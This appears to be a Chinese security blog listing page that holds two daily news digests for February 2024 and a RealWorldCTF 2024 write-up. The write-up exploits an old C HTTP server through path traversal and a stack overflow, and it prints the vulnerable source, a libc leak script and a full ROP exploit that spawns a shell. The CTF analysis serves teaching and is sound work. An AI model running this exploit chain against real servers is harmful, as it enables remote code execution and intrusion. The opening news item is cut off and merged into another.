Knight勒索组织的一名代表正在黑客论坛上向单个买家出售所谓的 Knight 勒索软件第三次迭代的源代码。Knight 勒索软件于 2023 年 7 月末作为 Cyclops 操作的重新命名推出,针对 Windows、macOS 和 Linux/ESXi 系统。帖子中表示:“出售 Knight 3.0 勒索软件的源代码,这将包括面板和储物柜的源代码,所有源代码均由 7、新曝光的恶意PyPI软件包使用隐蔽侧载手段进行攻击 https://thehackernews.com/2024/02/new-malicious-pypi-packages-caught.html ReversingLabs的研究员Petar Kirhmajer在与《黑客新闻》分享的报告中表示:“最新发现的案例展示了一个开源包执行DLL侧加载的情形,这表明软件供应链威胁的范围正在不断扩大。” 8、微软Exchange曝高危漏洞近10万台服务器面临风险 https://www.secrss.com/articles/63764 编号为CVE-2024-21410,该漏洞严重威胁到全球大量邮件服务器的安全,目前已经有黑客开始积极野外利用。 9、Wyze摄像头故障,13000名用户观看到了其他人家中的影像 https://www.hackread.com/wyze-cameras-glitch-users-saw-home-footage/ Wyze表示,此次隐私泄露事件与一个第三方缓存客户端库有关,该库在网络负载较高和多台设备同时在线的情况下出现了问题,导致设备ID和用户ID的对应关系混乱,数据被错误地发送到了错误的账户。 10、FTC 指控 Avast 向广告商出售客户浏览数据 https://www.securityweek.com/ftc-accuses-avast-of-selling-customer-browsing-data-to-advertisers/ 欧洲安全供应商 Avast 被指控通过其浏览器扩展和防病毒软件收集消费者网络浏览数据,并“在没有充分通知和未经消费者同意的情况下出售这些数据”。 声明 以上内容原文来自互联网的公共方式,仅用于有限分享,译文内容不代表蚁景科技观点,因此第三方对以上内容进行分享、传播等行为,以及所带来的一切后果与译者和蚁景科技无关。以上内容亦不得用于任何商业目的,若产生法律责任,译者与蚁景科技一律不予承担。
网络安全日报 2024年02月22日
1、新的Migo恶意软件针对Redis服务器开展挖矿活动 https://www.cadosecurity.com/migo-a-redis-miner-with-novel-system-weakening-techniques/ 研究人员最近遇到了一种针对 Redis 进行初始访问的新型恶意软件活动。虽然 Redis 对于 Linux 和云攻击者的利用并不陌生,但这次特殊的攻击活动涉及使用许多新颖的系统削弱技术来攻击数据存储本身。 该恶意软件被开发人员命名为 Migo,是一种 Golang ELF 二进制文件,具有编译时混淆功能并能够在 Linux 机器上持久存在。旨在破坏 Redis 服务器,以便在底层 Linux 主机上挖掘加密货币。 研究 2、研究人员发现攻击者利用PyPI旁加载恶意DLL https://www.reversinglabs.com/blog/attackers-leverage-pypi-to-sideload-malicious-dlls 网络安全研究人员在Python包索引 (PyPI) 存储库中发现了两个恶意包,这些包利用一种称为DLL 侧面加载的技术来规避安全软件的检测并运行恶意代码。这些名为NP6HelperHttptest和NP6HelperHttper 的软件包在被删除之前分别被下载了537 次和166 次。研究人员表示:“最新发现是由开源包执行的 DLL 侧载示例,这表明软件供应链威胁的范围正在扩大。”研究人员对这两个软件包的发现方式,以及对开 3、NCA联合国际执法行动破坏LockBit设施并发布解密密钥 https://www.nationalcrimeagency.gov.uk/news/nca-leads-international-investigation-targeting-worlds-most-harmful-ransomware-group 美国国家犯罪局于2 月 20 日公布了针对世界上危害最大的网络犯罪组织 LockBit 的国际破坏活动的详细信息。 在渗透到该组织的网络后,NCA 已经控制了 LockBit 的服务,从而损害了他们的整个犯罪事业。LockBit 已经运行四年了,该组织向全球黑客或“附属机构”网络提供勒索软件即服务,为他们提供实施攻击所需的工具和基础设施。 4、苹果为 iMessage 添加后量子加密协议PQ3 https://www.securityweek.com/apple-adds-post-quantum-encryption-to-imessage/ 苹果周三推出了 PQ3,这是一种新的 iMessage 后量子加密协议,旨在保护加密通信,甚至免受未来量子计算攻击。 5、VoltSchemer攻击利用无线充电器注入语音命令,炸毁手机 https://www.securityweek.com/researchers-devise-voltschemer-attacks-targeting-wireless-chargers/ 来自佛罗里达大学的一组学术研究人员和 Web3 智能合约审核员 CertiK 设计了新的攻击,通过电源电压操纵导致无线充电器接管。这种名为VoltSchemer (PDF)的理论攻击针对的是无线充电系统中的漏洞,这些漏洞可能使攻击者能够损坏充电设备、操纵语音助手并绕过 Qi 标准的机制来损坏暴露在强磁场中的物品。 6、Chrome 122、Firefox 123 修补高严重性漏洞 https://www.securityweek.com/chrome-122-firefox-123-patch-high-severity-vulnerabilities/ 谷歌和 Mozilla 本周发布了 Chrome 和 Firefox 软件更新,以解决这两种浏览器中的多个漏洞,包括高严重性内存安全漏洞。 7、波兰新总理称前任政府非法使用间谍软件 Pegasus https://apnews.com/article/poland-government-pegasus-spyware-tusk-duda-78420fc7099401926d28b5be98669192 去年 12 月就任波兰总理的公民纲领党主席 Donald Tusk 上周表示,他有文件证明前任政府非法使用了间谍软件 Pegasus。 8、20家大型科技公司签署“协议”打击人工智能选举深度造假 https://cybernews.com/tech/big-tech-signs-accord-to-battle-2024-election-ai-deepfakes/ 至少 20 家大型科技公司(包括 Google、Meta Platforms、微软和 OpenAI)已签署一项新的“技术协议”,旨在防止 2024 年全球选举周期期间传播欺骗性人工智能内容。 9、Android 银行木马 Anatsa正在欧洲多国扩散 https://securityaffairs.com/159344/malware/anatsa-banking-trojan-resurgence.html 该恶意软件此前主要针对英国、德国和西班牙进行活动,但最新的活动针对的是斯洛伐克、斯洛文尼亚和捷克,这表明其运营策略发生了转变。 10、欧盟因儿童保护和隐私问题对 TikTok 展开调查 https://www.infosecurity-magazine.com/news/eu-investigation-tiktok-privacy/ 出于对未成年人保护、广告政策和隐私的担忧,欧盟委员会于 2 月 19 日宣布,将启动正式程序,评估该社交媒体平台是否违反了欧盟《数字服务法》(DSA)。 声明 以上内容原文来自互联网的公共方式,仅用于有限分享,译文内容不代表蚁景科技观点,因此第三方对以上内容进行分享、传播等行为,以及所带来的一切后果与译者和蚁景科技无关。以上内容亦不得用于任何商业目的,若产生法律责任,译者与蚁景科技一律不予承担。
深入解析RealWorldCTF 2024体验赛PWN方向题目
前言 本报告旨在对RealWorldCTF 2024体验赛中的Pwn方向题目——"Be-an-HTPPd-Hacker"进行深入解析和讲解。该题目涉及一个十一年前的项目,其基于C语言实现了HTTP协议。我们将通过对该协议进行栈溢出攻击,探索真实世界中的攻击手法,并从中学习更多有用的攻击技巧,以提升我们的安全水平。通过理解攻击原理和方法,我们能够更好地理解安全防御的重要性,并为未来的安全工作做好准备。本报告将详细介绍攻击过程,希望能为读者提供深入而有价值的学习体验。 搜索字符串,github找源码 从IDA中,shift+F12提取,得到字符串,在github进行搜索能够得到源码在这: https://github.com/bnlf/httpd/blob/943cb06a09eb553096956b2e394b8366124e0aac/src/httpd.c具体构造 构造的代码如下,也就是方法 地址 加协议: method, uri, vProtocol 如 POST http://www.baidu.com xxx 源码如下: request parseRequest(char buffer[]) { char *ptr = buffer; char method[MAXLINE], uri[MAXLINE], vProtocol[MAXLINE]; request req; sscanf(ptr, "%s %s %s", method, uri, vProtocol); // Somente GET ou POST if(strcasecmp(method, "GET") == 0)        req.method = "GET"; else if (strcasecmp(method, "POST") == 0)        req.method = "POST";    else {   req.method = "INVALID"; req.vProtocol = "INVALID"; req.uri[0] = '\0'; return req;   }    // Sera testado futuramente. Por enquanto aceita que é um uri valido    req.uri = uri;        if(strcasecmp(vProtocol, "HTTP/1.0") == 0) req.vProtocol = "HTTP/1.0"; else if (strcasecmp(vProtocol, "HTTP/1.1") == 0) req.vProtocol = "HTTP/1.1";    else   req.vProtocol = "HTTP/1.1"; // se nao especificado return req; } GET路径穿越 其中get请求,经过简单尝试和逆向发现存在路径穿越,其直接对WWW进行拼接读取。 else if (res.status == 200 ) // Ok { return sendFile(req, res,connfd); } 阅读源码发现如上。 路径穿越漏洞(Path Traversal Vulnerability)是一种常见的安全漏洞,通常发生在Web应用程序或文件系统中。它允许攻击者访问他们没有权限访问的文件或目录,通过修改文件路径来绕过应用程序的访问控制机制。 不过flag没有可读权限,只能通过readflag来执行。 from evilblade import * context(os='linux', arch='amd64') # context(os='linux', arch='amd64', log_level='debug') #GET /index.html HTTP/1.1 setup('./pwn') libset('./libc.so.6') rsetup('127.0.0.1',33333) # rsetup('121.40.246.203',30594) # pause() payload = 'GET ' + '/img/../../../etc/profile HTTP/1.0\x00' # payload = b'POST /form-example.html/../img/../../../add HTTP/1.1\r\n' pause() sl(payload) ia() 这是路径穿越读/etc/profile。 POST栈溢出 其实不是源码也分析的差不多了,就是不太理解这个&=的分割,还有会存在一个奇怪的堆溢出,堆溢出主要是因为malloc大小引起的,在计算    char *line = (char*) malloc(end-start); 中,end出现小于start的情况。我们可以输入多个\n来使得heap足够大,避免溢出的情况。 代码可以看到: int sendPostMessage(request req, response res, int connfd, char *linePost){ char buffer[MAXLINE]; //Prepara cabecalho HTML sprintf(buffer, "<html><head><title>Submitted Form</title></head>"); //Cria body strcat(buffer, "<body><h1>Received variables</h1><br><table>"); strcat(buffer, "<tr><th>Variables</th><th>Values</th></tr>"); char * pch; char temp[250]; pch = strtok (linePost,"&="); while (pch != NULL) { sprintf(temp, "<tr><td>%s</td>", pch); strcat(buffer, temp); pch = strtok (NULL, "&="); sprintf(temp, "<td>%s</td></tr>", pch); strcat(buffer, temp); pch = strtok (NULL, "&="); } //Fecha body e html strcat(buffer, "</table></body></html>"); sendHeader(connfd, req, res, "OK", "text/html"); write(connfd, buffer, strlen(buffer)); return 0; } 也就是会根据&或者=分割之后,进行连接到temp。 其中linepost如下: void httpd(int connfd) {                     char buffer[MAXLINE]; // Buffer dos dados de input char fileBuffer[MAXLINE]; request req; // Pedido do cliente response res; // Resposta do servidor struct stat st; int n; int sizeContent = -1; // Le o que está vindo no socket n=read(connfd, buffer, MAXLINE); int i = strlen(buffer); char options[MAXLINE]; int statusRead = 0; strcpy(options, buffer); while(statusRead == 0) { if((options[i-3] == '\n' && options[i-1] == '\n') || options[i-1] != '\n') { statusRead = 1; } else { n=read(connfd, options, MAXLINE); //strcat(buffer, options); //printf("%s\n", buffer); i = strlen(options); if(options[0] == '\r' && options[1] == '\n' && n == 2) statusRead = 1; } } // Faz o parse da requisicao req = parseRequest(buffer); char *linePost; //Encontra no buffer o tamanho do conteudo if(strcmp(req.method, "POST") ==0) { linePost = getLastLineRead(buffer); } //……char *getLastLineRead(char *buffer) {    int numLines = 0;    int start = 0;    int end = 0;    int bufSize = strlen(buffer);        int i = 0;    int j = 0;    for (i=0;i<bufSize;i++) {        if (buffer[i]=='\n') {            numLines++;       }   }    int *vetPositionLine = (int*) malloc(numLines);      for (i=0;i<bufSize;i++) {        if (buffer[i]=='\n') {            vetPositionLine[j] = i;//出现回车的地方            j++;                   }   }    start = vetPositionLine[numLines-3];    end = vetPositionLine[numLines-1];          char *line = (char*) malloc(end-start);    strncpy(line,buffer+end,bufSize-end);    return line; } 就是说当他会把\n处作为起始地址,然后把后面的内容复制到line,这样就可以泄漏地址了! 使用exp: from evilblade import * context(os='linux', arch='amd64') setup('./pwn') libset('./libc.so.6') rsetup('127.0.0.1',33333) payload = b'POST '+ b'A'*3982 + b'\n' pause() sl(payload) ia() 调试方法:执行exp后,用ps -ef | grep 'httpd'之后找到最新的进程用sudo gdb -p PID即可。 或者直接使用命令:sudo gdb -p $(pgrep -n -f './httpd 12345') 最后会从buf+你输入的数据长度,取一个数据写到heap中,下次取出来作参数。 主要对此处进行断点观察。 可以看到: 由此可以泄漏出libc甚至其他了。 使用脚本: from evilblade import * context(os='linux', arch='amd64') setup('./pwn') libset('./libc.so.6') rsetup('127.0.0.1',33333) payload = b'POST '+ b'A'*3982 + b'\n' sl(payload) ru("Values</th></tr><tr><td>") stack = u32(rv(4)) dx(stack) ld = u32(rv(4))-0xc0c dx(ld) libc = u32(rv(4))-2324400 dx(libc) ia() 泄漏得到: --------------- your stack is >>> 0xff9c9f0a --------------- --------------- your ld is >>> 0xedf40000 --------------- --------------- your libc is >>> 0xedcca000 --------------- 构造ROP 从这个部分可以发现,会将原本的内容根据&=分割,然后加上<tr><td>之类的字符串,使得字符串长度变大,会导致栈溢出。那么我们根据前面得到的基地址,和这个部分漏洞进行ROP构造,从而getshell。 char * pch; char temp[250]; pch = strtok (linePost,"&="); while (pch != NULL) { sprintf(temp, "<tr><td>%s</td>", pch); strcat(buffer, temp); pch = strtok (NULL, "&="); sprintf(temp, "<td>%s</td></tr>", pch); strcat(buffer, temp); pch = strtok (NULL, "&="); } 做以下构造,经过多次尝试终于得到了控制返回地址为xxxx: from evilblade import * context(os='linux', arch='amd64') setup('./pwn') libset('./libc.so.6') rsetup('127.0.0.1',33333) payload = b'POST '+ b'A='*1850 #test= cyclic(0x700).decode() #modified_test = ''.join(['=' if (i) % 5 == 0 else test[i] for i in range(len(test))]) #d(modified_test) payload = b'POST / A\n'+ b"A"*2400 + b"\n" payload += b"=aaxxca=adaaaaa=eaaaa=aaag=aaha=aiaa=jaaa=aaal=aama=anaa=oaaa=aaaq=aara=asaa=taaa=aaav=aawa=axaa=yaaa=aabb=abca=bdaa=eaab=aabg=abha=biaa=jaab=aabl=abma=bnaa=oaab=aabq=abra=bsaa=taab=aabv=abwa=bxaa=yaab=aacb=acca=cdaa=eaac=aacg=acha=ciaa=jaac=aacl=acma=cnaa=oaac=aacq=acra=csaa=taac=aacv= payload += b"=" + p32(0xeb029050)*10+ b"xxxx" + b"=" d(payload) dpx('len',len(payload)) pause() sd(payload) 其中xxxx为任意地址,可以返回! 由于 sprintf的原因,不能输入\x00和\n之类的作为rop,我这里采取加减法的方式进行绕过,先输入不包含0和0a的字符,后续根据加减恢复到我们需要的字符。 搜索有: pwndbg> search -4 0x11111111 Searching for value: b'\x11\x11\x11\x11' libc.so.6       0xf0ca28f4 0x11111111 libc.so.6       0xf0ca2a08 0x11111111 libc.so.6       0xf0ca2a0c 0x11111111 计算得到: λ ~/ python Python 3.11.6 (main, Nov 14 2023, 09:36:21) [GCC 13.2.1 20230801] on linux Type "help", "copyright", "credits" or "license" for more information. >>> hex(0xf0ca28f4 -0xf0af1000) '0x1b18f4'#这是libc偏移 >>> hex(0x100000000-0x11111111) '0xeeeeeeef' >>> 那么我们用以上作为差值计算,其中0x11111111+0xeeeeeeef相加等于0。 构造的ROP如下: push_esi = p32(libc+0x00061c0d) # push esi ; ret nop_ret = p32(libc+0x0002fce8) # nop ; ret read = p32(symoff("read",libc)) pop_ebx = p32(0x0002c01f+libc) # pop ebx ; ret add_ebx = p32(0x001959c2 +libc)# add ebx, eax ; add eax, 2 ; ret) pop_eax = p32(libc+0x0002ed92)#: pop eax ; ret) add_ecx = p32(libc+0x000b4fd3) # : add ecx, dword ptr [ebx + 0x5f082444] ; ret) # dup2($ebx,$ecx) rop =  pop_esi + dup22 rop += pop_ebx + p32(libc+0x1b18f4-0x5f082444) rop += pop_ecx_eax + p32(0xeeeeeeef)*2 rop += add_ecx #$ecx = 0 rop += pop_ebx + p32(0xeeeeeeef) + pop_eax + p32(0x11111111+0x4) rop += add_ebx #$ebx = 4 rop += push_esi rop += pop_esi + dup22 rop += pop_ebx + p32(libc+0x1b18f4-0x5f082444) rop += pop_ecx_eax + p32(0xeeeeeeef+0x1)*2 rop += add_ecx #$ecx=1 rop += pop_ebx + p32(0xeeeeeeef) + pop_eax + p32(0x11111111+0x4) rop += add_ebx #$ebx = 4 rop += push_esi rop += p32(symoff("system",libc)) + p32(0xdeadbef) + p32(libc+0x001bd0d5) if b"=" in rop or b"\x00" in rop:    print("stop!")    pause() payload = b'POST '+ b"A"*2400 + b"\n" payload += b"=aaxxca=adaaaaa=eaaaa=aaag=aaha=aiaa=jaaa=aaal=aama=anaa=oaaa=aaaq=aara=asaa=taaa=aaav=aawa=axaa=yaaa=aabb=abca=bdaa=eaab=aabg=abha=biaa=jaab=aabl=abma=bnaa=oaab=aabq=abra=bsaa=taab=aabv=abwa=bxaa=yaab=aacb=acca=cdaa=eaac=aacg=acha=ciaa=jaac=aacl=acma=cnaa=oaac=aacq=acra=csaa=taac=aacv= payload += b"=" + (nop_ret)*10 payload += rop payload += b"=" 完整exp如下: from evilblade import * context(os='linux', arch='amd64') setup('./pwn') libset('./libc.so.6') rsetup('127.0.0.1',33333) payload = b'POST '+ b'A'*3982 + b'\n' sl(payload) ru("Values</th></tr><tr><td>") stack = u32(rv(4))-0x1ed0a dx(stack) ld = u32(rv(4))-0xc0c dx(ld) libc = u32(rv(4))-2324400 dx(libc) close() rsetup('127.0.0.1',33333) payload = b'POST '+ b'A='*1850 #test= cyclic(0x700).decode() #modified_test = ''.join(['=' if (i) % 5 == 0 else test[i] for i in range(len(test))]) #d(modified_test) sub_eax_ecx = p32(libc + 0x0018b0f8) # sub eax, ecx ; ret push_eax = p32(libc + 0x00036a7d) # push eax ; ret pop_ecx_eax = p32(libc + 0x001280f4) # pop ecx ; pop eax ; ret dup22 = p32(symoff("dup2",libc)+0xe) push_edx = p32(libc+0x00192ac8) # push edx ; ret pop_edx = p32(libc+0x00037375) # pop edx ; ret pop_esi = p32(libc+0x00021479) # pop esi ; ret push_esi = p32(libc+0x00061c0d) # push esi ; ret nop_ret = p32(libc+0x0002fce8) # nop ; ret read = p32(symoff("read",libc)) pop_ebx = p32(0x0002c01f+libc) # pop ebx ; ret add_ebx = p32(0x001959c2 +libc)# add ebx, eax ; add eax, 2 ; ret) pop_eax = p32(libc+0x0002ed92)#: pop eax ; ret) add_ecx = p32(libc+0x000b4fd3) # : add ecx, dword ptr [ebx + 0x5f082444] ; ret) # dup2($ebx,$ecx) rop =  pop_esi + dup22 rop += pop_ebx + p32(libc+0x1b18f4-0x5f082444) rop += pop_ecx_eax + p32(0xeeeeeeef)*2 rop += add_ecx #$ecx = 0 rop += pop_ebx + p32(0xeeeeeeef) + pop_eax + p32(0x11111111+0x4) rop += add_ebx #$ebx = 4 rop += push_esi rop += pop_esi + dup22 rop += pop_ebx + p32(libc+0x1b18f4-0x5f082444) rop += pop_ecx_eax + p32(0xeeeeeeef+0x1)*2 rop += add_ecx #$ecx=1 rop += pop_ebx + p32(0xeeeeeeef) + pop_eax + p32(0x11111111+0x4) rop += add_ebx #$ebx = 4 rop += push_esi rop += p32(symoff("system",libc)) + p32(0xdeadbef) + p32(libc+0x001bd0d5) if b"=" in rop or b"\x00" in rop:    print("stop!")    pause() payload = b'POST '+ b"A"*2400 + b"\n" payload += b"=aaxxca=adaaaaa=eaaaa=aaag=aaha=aiaa=jaaa=aaal=aama=anaa=oaaa=aaaq=aara=asaa=taaa=aaav=aawa=axaa=yaaa=aabb=abca=bdaa=eaab=aabg=abha=biaa=jaab=aabl=abma=bnaa=oaab=aabq=abra=bsaa=taab=aabv=abwa=bxaa=yaab=aacb=acca=cdaa=eaac=aacg=acha=ciaa=jaac=aacl=acma=cnaa=oaac=aacq=acra=csaa=taac=aacv= payload += b"=" + (nop_ret)*10 payload += rop payload += b"=" d(payload) dpx('len',len(payload)) dpx("begin",uu64(pop_esi)) dpx("nop",uu64(nop_ret)) dx(stack) pause() sd(payload) ia() 攻击结果:
网络安全日报 2024年02月21日
1、网络犯罪分子利用PDF传播WikiLoader等恶意软件 https://www.infosecurity-magazine.com/news/pdf-malware-on-the-rise 研究人员发现随着网络犯罪分子通过 PDF 传播恶意软件(包括 WikiLoader、Ursnif 和 DarkGate),PDF 威胁呈上升趋势。与同年第一季度相比,2023 年第四季度 PDF 威胁增加了 7%。它指出,以前 PDF 诱饵曾被用来通过网络钓鱼获取受害者的凭据和财务详细信息。现在恶意软件正在通过这些文档传播。研究人员表示,一个值得注意的例子是 WikiLoader 活动使用虚假包裹递送 PDF 来诱骗用户安装 Ursnif 恶意软件。用于加剧攻 2、Anatsa木马绕过Google Play检测并扩大影响范围 https://www.threatfabric.com/blogs/anatsa-trojan-returns-targeting-europe-and-expanding-its-reach 近期研究人员发现名为Anatsa的 Android 银行木马已将其关注范围扩大到斯洛伐克、斯洛文尼亚和捷克。一份报告中表示:“尽管 Google Play 增强了检测和保护机制,但该活动中的一些植入程序仍成功利用了无障碍服务。 ”, 该活动总共涉及 5 个植入程序,总安装量超过 100,000 次。Anatsa 也被称为 TeaBot 和 Toddler,Anatsa 的活动可以归类为“有针对性”的 3、Meta警告8家间谍软件公司针对iOS等设备 https://thehackernews.com/2024/02/meta-warns-of-8-spyware-firms-targeting.html Meta Platforms 表示,它采取了一系列措施来遏制来自意大利、西班牙和阿拉伯联合酋长国 (UAE) 的八家不同公司的恶意活动,这些公司从事租赁监控行业。这些调查结果是其2023 年第四季度对抗威胁报告的一部分。该间谍软件针对 iOS、Android 和 Windows 设备。该公司表示:“他们的各种恶意软件包括收集和访问设备信息、位置、照片和媒体、联系人、日历、电子邮件、短信、社交媒体和消息应用程序,以及启用麦克风、摄像头和屏 4、德国电池制造商 VARTA AG 遭到网络攻击导致停产 https://www.anquanke.com/post/id/293242 德国电池制造商 VARTA AG 面临 网络攻击,迫使该公司五个工厂暂时停止生产。由于部分IT基础设施遭到攻击,该公司不得不停止运行IT系统并断开与互联网的连接,以确保安全。 5、德韩情报机构披露朝鲜黑客与国防部门供应链攻击有关 https://www.bleepingcomputer.com/news/security/north-korean-hackers-linked-to-defense-sector-supply-chain-attack/ 德国联邦情报机构 (BfV) 和韩国国家情报局 (NIS) 在今天的一份公告中警告称,朝鲜政府正在针对全球国防部门开展网络间谍活动。这些攻击旨在窃取先进的军事技术信息,帮助朝鲜实现常规武器现代化并发展新的军事能力。公告重点介绍了朝鲜行为者(其中之一是 Lazarus 组织)发起的两个案例,以提供攻击者使用的战术、技术和程序 (TTP)。 6、俄罗斯黑客通过Roundcube漏洞瞄准80多个组织 https://www.recordedfuture.com/russia-aligned-tag-70-targets-european-government-and-military-mail 与白俄罗斯和俄罗斯利益一致的威胁行为者与一项新的网络间谍活动有关,该活动可能利用 Roundcube 网络邮件服务器中的跨站脚本 (XSS) 漏洞来针对 80 多个组织。据 Recorded Future 称,这些实体主要位于格鲁吉亚、波兰和乌克兰,该公司将这次入侵归因于名为 Winter Vivern 的威胁行为者,该威胁者也被称为 TA473 和 UAC0114。该网络安全公司正在追踪名为“威 7、新的零日漏洞可能会影响多达 97,000 台Exchange 服务器 https://www.securityweek.com/recent-zero-day-could-impact-up-to-97000-microsoft-exchange-servers/ 非营利网络安全组织 Shadowserver 基金会周一警告称,有超过 28,000 台可通过互联网访问的 Microsoft Exchange 服务器受到最近披露的零日漏洞的影响。Shadowserver 表示,大约 68,000 个其他 Exchange 实例被认为“可能”易受攻击,这意味着它们安装了缓解措施,这使得潜在可利用的服务器总数达到大约 97,000 个。 8、Lockbit勒索软件被国际执法行动重创,解密器已发布 https://securityaffairs.com/159388/cyber-crime/operation-cronos-against-lockbit.html 国际执法行动控制了他们的基础设施,获取了他们的源代码,并获得了帮助受害者解密他们系统的密钥。Lockbit 勒索软件的免费解密器可以从"No More Ransom"下载。 9、CACTUS勒索软件团伙声称施耐德电气窃取了1.5TB 数据 https://securityaffairs.com/159353/hacking/cactus-ransomware-gang-schneider-electric.html Cactus 勒索软件团伙声称从能源管理和工业自动化公司施耐德电气窃取了 1.5TB 的数据。这次攻击影响了施耐德电气资源顾问云平台的服务,导致服务中断。施耐德电气表示,公司其他部门并未受到网络攻击的影响。 10、WordPress Bricks Builder 主题存在RCE漏洞 https://www.bleepingcomputer.com/news/security/hackers-exploit-critical-rce-flaw-in-bricks-wordpress-site-builder/ Bricks Builder 主题是一个高级 WordPress 主题,被描述为创新的、社区驱动的可视化网站构建器。该产品拥有约 25,000 个活跃安装量,促进了网站设计的用户友好性和定制化。 声明 以上内容原文来自互联网的公共方式,仅用于有限分享,译文内容不代表蚁景科技观点,因此第三方对以上内容进行分享、传播等行为,以及所带来的一切后果与译者和蚁景科技无关。以上内容亦不得用于任何商业目的,若产生法律责任,译者与蚁景科技一律不予承担。
第2页 第3页 第4页 第5页 第6页 第7页 第8页 第9页 第10页 第11页 第12页 第13页 第14页 第15页 第16页 第17页 第18页 第19页 第20页 第21页 第22页 第23页 第24页 第25页 第26页 第27页 第28页 第29页 第30页 第31页 第32页 第33页 第34页 第35页 第36页 第37页 第38页 第39页 第40页 第41页 第42页 第43页 第44页 第45页 第46页 第47页 第48页 第49页 第50页 第51页 第52页 第53页 第54页 第55页 第56页 第57页 第58页 第59页 第60页 第61页 第62页 第63页 第64页 第65页 第66页 第67页 第68页 第69页 第70页 第71页 第72页 第73页 第74页 第75页 第76页 第77页 第78页 第79页 第80页 第81页 第82页 第83页 第84页 第85页 第86页 第87页 第88页 第89页 第90页 第91页 第92页 第93页 第94页 第95页 第96页 第97页 第98页 第99页 第100页 第101页 第102页 第103页 第104页 第105页 第106页 第107页 第108页 第109页 第110页 第111页 第112页 第113页 第114页 第115页 第116页 第117页 第118页 第119页 第120页 第121页 第122页 第123页 第124页 第125页 第126页 第127页 第128页 第129页 第130页 第131页 第132页 第133页 第134页 第135页 第136页 第137页 第138页 第139页 第140页 第141页 第142页 第143页 第144页 第145页 第146页 第147页 第148页 第149页 第150页 第151页 第152页 第153页 第154页 第155页 第156页 第157页 第158页 第159页 第160页 第161页 第162页 第163页 第164页 第165页 第166页 第167页 第168页 第169页 第170页 第171页 第172页 第173页 第174页 第175页 第176页 第177页 第178页 第179页 第180页 第181页 第182页 第183页 第184页 第185页 第186页 第187页 第188页 第189页 第190页 第191页 第192页 第193页 第194页 第195页 第196页 第197页 第198页 第199页 第200页 第201页 第202页 第203页 第204页 第205页 第206页 第207页 第208页 第209页 第210页 第211页